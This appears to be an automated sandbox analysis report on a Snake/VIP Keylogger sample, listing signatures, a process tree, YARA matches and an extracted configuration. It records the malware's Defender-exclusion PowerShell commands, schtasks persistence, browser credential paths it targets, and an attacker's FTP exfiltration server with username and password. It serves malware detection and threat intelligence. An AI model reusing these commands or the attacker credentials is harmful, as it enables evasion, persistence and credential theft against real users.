Edit tour

Windows Analysis Report
3140, EUR.exe

Overview

General Information

Sample name:	3140, EUR.exe
Analysis ID:	1522669
MD5:	332593ae1e0ba5a06370963c37bbbceb
SHA1:	994f8e733ba1961882dcdef0c78fc305db4c1c91
SHA256:	9ca5a71321522f47140b36e5f1983cff7455dd124caa231d97df29cd654c6893
Tags:	exeSnakeKeyloggeruser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Connects to many ports of the same IP (likely port scanning)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

3140, EUR.exe (PID: 6844 cmdline: "C:\Users\user\Desktop\3140, EUR.exe" MD5: 332593AE1E0BA5A06370963C37BBBCEB)

powershell.exe (PID: 2124 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7320 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 3120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6692 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

3140, EUR.exe (PID: 7180 cmdline: "C:\Users\user\Desktop\3140, EUR.exe" MD5: 332593AE1E0BA5A06370963C37BBBCEB)

lkuPOyvaWlIu.exe (PID: 7276 cmdline: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe MD5: 332593AE1E0BA5A06370963C37BBBCEB)

schtasks.exe (PID: 7472 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

lkuPOyvaWlIu.exe (PID: 7516 cmdline: "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe" MD5: 332593AE1E0BA5A06370963C37BBBCEB)

lkuPOyvaWlIu.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe" MD5: 332593AE1E0BA5A06370963C37BBBCEB)

lkuPOyvaWlIu.exe (PID: 7552 cmdline: "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe" MD5: 332593AE1E0BA5A06370963C37BBBCEB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "FTP", "Username": "humble@quicklyserv.com", "Password": "omobolajijonze12345", "FTP Server": "ftp://quicklyserv.com/"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.4119574462.000000000043E000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2eb7d:$a1: get_encryptedPassword 0x2ee9a:$a2: get_encryptedUsername 0x2e98d:$a3: get_timePasswordChanged 0x2ea96:$a4: get_passwordField 0x2eb93:$a5: set_encryptedPassword 0x30250:$a7: get_logins 0x301b3:$a10: KeyLoggerEventArgs 0x2fe18:$a11: KeyLoggerEventArgsEventHandler
0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e745:$a1: get_encryptedPassword 0x71f65:$a1: get_encryptedPassword 0x2ea62:$a2: get_encryptedUsername 0x72282:$a2: get_encryptedUsername 0x2e555:$a3: get_timePasswordChanged 0x71d75:$a3: get_timePasswordChanged 0x2e65e:$a4: get_passwordField 0x71e7e:$a4: get_passwordField 0x2e75b:$a5: set_encryptedPassword 0x71f7b:$a5: set_encryptedPassword 0x2fe18:$a7: get_logins 0x73638:$a7: get_logins 0x2fd7b:$a10: KeyLoggerEventArgs 0x7359b:$a10: KeyLoggerEventArgs 0x2f9e0:$a11: KeyLoggerEventArgsEventHandler 0x73200:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x363fbd:$a1: get_encryptedPassword 0x3a79dd:$a1: get_encryptedPassword 0x3eb1fd:$a1: get_encryptedPassword 0x3642da:$a2: get_encryptedUsername 0x3a7cfa:$a2: get_encryptedUsername 0x3eb51a:$a2: get_encryptedUsername 0x363dcd:$a3: get_timePasswordChanged 0x3a77ed:$a3: get_timePasswordChanged 0x3eb00d:$a3: get_timePasswordChanged 0x363ed6:$a4: get_passwordField 0x3a78f6:$a4: get_passwordField 0x3eb116:$a4: get_passwordField 0x363fd3:$a5: set_encryptedPassword 0x3a79f3:$a5: set_encryptedPassword 0x3eb213:$a5: set_encryptedPassword 0x365690:$a7: get_logins 0x3a90b0:$a7: get_logins 0x3ec8d0:$a7: get_logins 0x3655f3:$a10: KeyLoggerEventArgs 0x3a9013:$a10: KeyLoggerEventArgs 0x3ec833:$a10: KeyLoggerEventArgs
Process Memory Space: 3140, EUR.exe PID: 6844	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 3140, EUR.exe PID: 6844	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 3140, EUR.exe PID: 6844	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: 3140, EUR.exe PID: 6844	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 3140, EUR.exe PID: 6844	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x76dc2:$a1: get_encryptedPassword 0x76ffc:$a2: get_encryptedUsername 0x76bef:$a3: get_timePasswordChanged 0x76cec:$a4: get_passwordField 0x76dd8:$a5: set_encryptedPassword 0x78d42:$a7: get_logins 0x78cba:$a10: KeyLoggerEventArgs 0x78a50:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: 3140, EUR.exe PID: 7180	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 3140, EUR.exe PID: 7180	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: lkuPOyvaWlIu.exe PID: 7276	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: lkuPOyvaWlIu.exe PID: 7276	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: lkuPOyvaWlIu.exe PID: 7276	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: lkuPOyvaWlIu.exe PID: 7276	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: lkuPOyvaWlIu.exe PID: 7276	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x17f2b:$a1: get_encryptedPassword 0x46e4b:$a1: get_encryptedPassword 0x1823e:$a2: get_encryptedUsername 0x4715e:$a2: get_encryptedUsername 0x17d45:$a3: get_timePasswordChanged 0x46c65:$a3: get_timePasswordChanged 0x17e4e:$a4: get_passwordField 0x46d6e:$a4: get_passwordField 0x17f41:$a5: set_encryptedPassword 0x46e61:$a5: set_encryptedPassword 0x1a3ea:$a7: get_logins 0x4930a:$a7: get_logins 0x1a34d:$a10: KeyLoggerEventArgs 0x4926d:$a10: KeyLoggerEventArgs 0x19fb6:$a11: KeyLoggerEventArgsEventHandler 0x48ed6:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: lkuPOyvaWlIu.exe PID: 7552	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: lkuPOyvaWlIu.exe PID: 7552	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: lkuPOyvaWlIu.exe PID: 7552	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.3140, EUR.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.3140, EUR.exe.4397fe0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.3140, EUR.exe.4397fe0.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.3140, EUR.exe.4397fe0.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.3140, EUR.exe.4397fe0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c1dd:$a1: get_encryptedPassword 0x2c4fa:$a2: get_encryptedUsername 0x2bfed:$a3: get_timePasswordChanged 0x2c0f6:$a4: get_passwordField 0x2c1f3:$a5: set_encryptedPassword 0x2d8b0:$a7: get_logins 0x2d813:$a10: KeyLoggerEventArgs 0x2d478:$a11: KeyLoggerEventArgsEventHandler
0.2.3140, EUR.exe.4397fe0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39f48:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x395eb:$a3: \Google\Chrome\User Data\Default\Login Data 0x39848:$a4: \Orbitum\User Data\Default\Login Data 0x3a227:$a5: \Kometa\User Data\Default\Login Data
0.2.3140, EUR.exe.4397fe0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ce01:$s1: UnHook 0x2ce08:$s2: SetHook 0x2ce10:$s3: CallNextHook 0x2ce1d:$s4: _hook
9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c1dd:$a1: get_encryptedPassword 0x2c4fa:$a2: get_encryptedUsername 0x2bfed:$a3: get_timePasswordChanged 0x2c0f6:$a4: get_passwordField 0x2c1f3:$a5: set_encryptedPassword 0x2d8b0:$a7: get_logins 0x2d813:$a10: KeyLoggerEventArgs 0x2d478:$a11: KeyLoggerEventArgsEventHandler
9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39f48:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x395eb:$a3: \Google\Chrome\User Data\Default\Login Data 0x39848:$a4: \Orbitum\User Data\Default\Login Data 0x3a227:$a5: \Kometa\User Data\Default\Login Data
9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ce01:$s1: UnHook 0x2ce08:$s2: SetHook 0x2ce10:$s3: CallNextHook 0x2ce1d:$s4: _hook
9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dfdd:$a1: get_encryptedPassword 0x2e2fa:$a2: get_encryptedUsername 0x2dded:$a3: get_timePasswordChanged 0x2def6:$a4: get_passwordField 0x2dff3:$a5: set_encryptedPassword 0x2f6b0:$a7: get_logins 0x2f613:$a10: KeyLoggerEventArgs 0x2f278:$a11: KeyLoggerEventArgsEventHandler
9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd48:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b3eb:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b648:$a4: \Orbitum\User Data\Default\Login Data 0x3c027:$a5: \Kometa\User Data\Default\Login Data
9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec01:$s1: UnHook 0x2ec08:$s2: SetHook 0x2ec10:$s3: CallNextHook 0x2ec1d:$s4: _hook
9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c1dd:$a1: get_encryptedPassword 0x2c4fa:$a2: get_encryptedUsername 0x2bfed:$a3: get_timePasswordChanged 0x2c0f6:$a4: get_passwordField 0x2c1f3:$a5: set_encryptedPassword 0x2d8b0:$a7: get_logins 0x2d813:$a10: KeyLoggerEventArgs 0x2d478:$a11: KeyLoggerEventArgsEventHandler
9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39f48:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x395eb:$a3: \Google\Chrome\User Data\Default\Login Data 0x39848:$a4: \Orbitum\User Data\Default\Login Data 0x3a227:$a5: \Kometa\User Data\Default\Login Data
9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ce01:$s1: UnHook 0x2ce08:$s2: SetHook 0x2ce10:$s3: CallNextHook 0x2ce1d:$s4: _hook
9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dfdd:$a1: get_encryptedPassword 0x717fd:$a1: get_encryptedPassword 0x2e2fa:$a2: get_encryptedUsername 0x71b1a:$a2: get_encryptedUsername 0x2dded:$a3: get_timePasswordChanged 0x7160d:$a3: get_timePasswordChanged 0x2def6:$a4: get_passwordField 0x71716:$a4: get_passwordField 0x2dff3:$a5: set_encryptedPassword 0x71813:$a5: set_encryptedPassword 0x2f6b0:$a7: get_logins 0x72ed0:$a7: get_logins 0x2f613:$a10: KeyLoggerEventArgs 0x72e33:$a10: KeyLoggerEventArgs 0x2f278:$a11: KeyLoggerEventArgsEventHandler 0x72a98:$a11: KeyLoggerEventArgsEventHandler
9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd48:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7f568:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b3eb:$a3: \Google\Chrome\User Data\Default\Login Data 0x7ec0b:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b648:$a4: \Orbitum\User Data\Default\Login Data 0x7ee68:$a4: \Orbitum\User Data\Default\Login Data 0x3c027:$a5: \Kometa\User Data\Default\Login Data 0x7f847:$a5: \Kometa\User Data\Default\Login Data
9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec01:$s1: UnHook 0x72421:$s1: UnHook 0x2ec08:$s2: SetHook 0x72428:$s2: SetHook 0x2ec10:$s3: CallNextHook 0x72430:$s3: CallNextHook 0x2ec1d:$s4: _hook 0x7243d:$s4: _hook
0.2.3140, EUR.exe.4397fe0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.3140, EUR.exe.4397fe0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.3140, EUR.exe.4397fe0.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.3140, EUR.exe.4397fe0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.3140, EUR.exe.4397fe0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dfdd:$a1: get_encryptedPassword 0x719fd:$a1: get_encryptedPassword 0xb521d:$a1: get_encryptedPassword 0x2e2fa:$a2: get_encryptedUsername 0x71d1a:$a2: get_encryptedUsername 0xb553a:$a2: get_encryptedUsername 0x2dded:$a3: get_timePasswordChanged 0x7180d:$a3: get_timePasswordChanged 0xb502d:$a3: get_timePasswordChanged 0x2def6:$a4: get_passwordField 0x71916:$a4: get_passwordField 0xb5136:$a4: get_passwordField 0x2dff3:$a5: set_encryptedPassword 0x71a13:$a5: set_encryptedPassword 0xb5233:$a5: set_encryptedPassword 0x2f6b0:$a7: get_logins 0x730d0:$a7: get_logins 0xb68f0:$a7: get_logins 0x2f613:$a10: KeyLoggerEventArgs 0x73033:$a10: KeyLoggerEventArgs 0xb6853:$a10: KeyLoggerEventArgs
0.2.3140, EUR.exe.4397fe0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd48:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7f768:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc2f88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b3eb:$a3: \Google\Chrome\User Data\Default\Login Data 0x7ee0b:$a3: \Google\Chrome\User Data\Default\Login Data 0xc262b:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b648:$a4: \Orbitum\User Data\Default\Login Data 0x7f068:$a4: \Orbitum\User Data\Default\Login Data 0xc2888:$a4: \Orbitum\User Data\Default\Login Data 0x3c027:$a5: \Kometa\User Data\Default\Login Data 0x7fa47:$a5: \Kometa\User Data\Default\Login Data 0xc3267:$a5: \Kometa\User Data\Default\Login Data
0.2.3140, EUR.exe.4397fe0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec01:$s1: UnHook 0x72621:$s1: UnHook 0xb5e41:$s1: UnHook 0x2ec08:$s2: SetHook 0x72628:$s2: SetHook 0xb5e48:$s2: SetHook 0x2ec10:$s3: CallNextHook 0x72630:$s3: CallNextHook 0xb5e50:$s3: CallNextHook 0x2ec1d:$s4: _hook 0x7263d:$s4: _hook 0xb5e5d:$s4: _hook
0.2.3140, EUR.exe.4312dc0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.3140, EUR.exe.4312dc0.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.3140, EUR.exe.4312dc0.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.3140, EUR.exe.4312dc0.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.3140, EUR.exe.4312dc0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb31fd:$a1: get_encryptedPassword 0xf6c1d:$a1: get_encryptedPassword 0x13a43d:$a1: get_encryptedPassword 0xb351a:$a2: get_encryptedUsername 0xf6f3a:$a2: get_encryptedUsername 0x13a75a:$a2: get_encryptedUsername 0xb300d:$a3: get_timePasswordChanged 0xf6a2d:$a3: get_timePasswordChanged 0x13a24d:$a3: get_timePasswordChanged 0xb3116:$a4: get_passwordField 0xf6b36:$a4: get_passwordField 0x13a356:$a4: get_passwordField 0xb3213:$a5: set_encryptedPassword 0xf6c33:$a5: set_encryptedPassword 0x13a453:$a5: set_encryptedPassword 0xb48d0:$a7: get_logins 0xf82f0:$a7: get_logins 0x13bb10:$a7: get_logins 0xb4833:$a10: KeyLoggerEventArgs 0xf8253:$a10: KeyLoggerEventArgs 0x13ba73:$a10: KeyLoggerEventArgs
0.2.3140, EUR.exe.4312dc0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb3e21:$s1: UnHook 0xf7841:$s1: UnHook 0x13b061:$s1: UnHook 0xb3e28:$s2: SetHook 0xf7848:$s2: SetHook 0x13b068:$s2: SetHook 0xb3e30:$s3: CallNextHook 0xf7850:$s3: CallNextHook 0x13b070:$s3: CallNextHook 0xb3e3d:$s4: _hook 0xf785d:$s4: _hook 0x13b07d:$s4: _hook
0.2.3140, EUR.exe.428dba0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.3140, EUR.exe.428dba0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.3140, EUR.exe.428dba0.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.3140, EUR.exe.428dba0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.3140, EUR.exe.428dba0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13841d:$a1: get_encryptedPassword 0x17be3d:$a1: get_encryptedPassword 0x1bf65d:$a1: get_encryptedPassword 0x13873a:$a2: get_encryptedUsername 0x17c15a:$a2: get_encryptedUsername 0x1bf97a:$a2: get_encryptedUsername 0x13822d:$a3: get_timePasswordChanged 0x17bc4d:$a3: get_timePasswordChanged 0x1bf46d:$a3: get_timePasswordChanged 0x138336:$a4: get_passwordField 0x17bd56:$a4: get_passwordField 0x1bf576:$a4: get_passwordField 0x138433:$a5: set_encryptedPassword 0x17be53:$a5: set_encryptedPassword 0x1bf673:$a5: set_encryptedPassword 0x139af0:$a7: get_logins 0x17d510:$a7: get_logins 0x1c0d30:$a7: get_logins 0x139a53:$a10: KeyLoggerEventArgs 0x17d473:$a10: KeyLoggerEventArgs 0x1c0c93:$a10: KeyLoggerEventArgs
